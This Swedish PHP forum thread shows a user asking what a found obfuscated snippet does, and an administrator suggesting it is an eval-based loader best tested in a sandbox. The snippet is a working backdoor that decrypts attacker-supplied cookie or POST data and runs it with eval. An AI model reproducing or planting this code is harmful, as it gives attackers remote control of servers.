Skadlig kod?

PHPportalen Forum Index » PHP
Lägg ett bokmärke på hela tråden
Skapa nytt inlägg   Svara på inlägget
Visa föregående ämne :: Visa nästa ämne  
Startad av: Meddelande
marcusgarden



Medlem i: 3133 dagar

Status: Offline



#742263
Inlägg Skrivet: 2018-08-12 22:48      Ämne: Skadlig kod? Citera

Hittat en kodsnutt, förmodligen skadlig, vad gör den?

KOD:
1:
$nadpavw = 'e9pua0tfH#\'rnsi3gv_b15m*xdklyc4-o68';$rgxmnw = Array();$rgxmnw[] = $nadpavw[5].$nadpavw[20].$nadpavw[19].$nadpavw[21].$nadpavw[0].$nadpavw[4].$nadpavw[29].$nadpavw[4].$nadpavw[31].$nadpavw[30].$nadpavw[4].$nadpavw[21].$nadpavw[1].$nadpavw[31].$nadpavw[30].$nadpavw[4].$nadpavw[29].$nadpavw[21].$nadpavw[31].$nadpavw[34].$nadpavw[29].$nadpavw[5].$nadpavw[15].$nadpavw[31].$nadpavw[20].$nadpavw[30].$nadpavw[7].$nadpavw[29].$nadpavw[19].$nadpavw[20].$nadpavw[5].$nadpavw[19].$nadpavw[4].$nadpavw[33].$nadpavw[19].$nadpavw[0];$rgxmnw[] = $nadpavw[8].$nadpavw[23];$rgxmnw[] = $nadpavw[9];$rgxmnw[] = $nadpavw[29].$nadpavw[32].$nadpavw[3].$nadpavw[12].$nadpavw[6];$rgxmnw[] = $nadpavw[13].$nadpavw[6].$nadpavw[11].$nadpavw[18].$nadpavw[11].$nadpavw[0].$nadpavw[2].$nadpavw[0].$nadpavw[4].$nadpavw[6];$rgxmnw[] = $nadpavw[0].$nadpavw[24].$nadpavw[2].$nadpavw[27].$nadpavw[32].$nadpavw[25].$nadpavw[0];$rgxmnw[] = $nadpavw[13].$nadpavw[3].$nadpavw[19].$nadpavw[13].$nadpavw[6].$nadpavw[11];$rgxmnw[] = $nadpavw[4].$nadpavw[11].$nadpavw[11].$nadpavw[4].$nadpavw[28].$nadpavw[18].$nadpavw[22].$nadpavw[0].$nadpavw[11].$nadpavw[16].$nadpavw[0];$rgxmnw[] = $nadpavw[13].$nadpavw[6].$nadpavw[11].$nadpavw[27].$nadpavw[0].$nadpavw[12];$rgxmnw[] = $nadpavw[2].$nadpavw[4].$nadpavw[29].$nadpavw[26];foreach ($rgxmnw[7]($_COOKIE, $_POST) as $zgtpci => $ubojzr){function yldsh($rgxmnw, $zgtpci, $bnzkw){return $rgxmnw[6]($rgxmnw[4]($zgtpci . $rgxmnw[0], ($bnzkw / $rgxmnw[8]($zgtpci)) + 1), 0, $bnzkw);}function snlvp($rgxmnw, $xdukpg){return @$rgxmnw[9]($rgxmnw[1], $xdukpg);}function kbhbg($rgxmnw, $xdukpg){$ngovlsq = $rgxmnw[3]($xdukpg) % 3;if (!$ngovlsq) {eval($xdukpg[1]($xdukpg[2]));exit();}}$ubojzr = snlvp($rgxmnw, $ubojzr);kbhbg($rgxmnw, $rgxmnw[5]($rgxmnw[2], $ubojzr ^ yldsh($rgxmnw, $zgtpci, $rgxmnw[8]($ubojzr))));}
 
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Azreal
Administratör



Medlem i: 4853 dagar
Från: Uppsala, bor i Göteborg
Status: Offline



#742264
Inlägg Skrivet: 2018-08-13 07:23      Ämne: Citera

Eftersom eval finns med i kodsnutten så är det nog kod som genererar kod för att köras just med eval.
Exakt vad/vilken kod är lite jobbigare att läsa ut då angriparen gjort det svårt att läsa Smile

Jag hade nog testat köra koden i en miljö som är skyddad för att se exakt vad som genereras.
 

_________________
Konsultation via PM, inte gratis.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Visa tidigare inlägg:   
Skapa nytt inlägg   Svara på inlägget
PHPportalen Forum Index » PHP
Hoppa till:  
Du kan inte skapa nya inlägg i det här forumet
Du kan inte svara på inlägg i det här forumet
Du kan inte ändra dina inlägg i det här forumet
Du kan inte ta bort dina inlägg i det här forumet
Du kan inte rösta i det här forumet
Du kan inte bifoga filer i detta forum
Du kan inte ladda ner filer från detta forum
Kontakta oss på adressen: info@phpportalen.net
Webbplatsen bygger i grunden på phpBB © 2001, 2002 phpBB Group

Modifieringar har senare gjorts i systemet av PHPportalen
Sid och logotypdesign skapad av Daren Jularic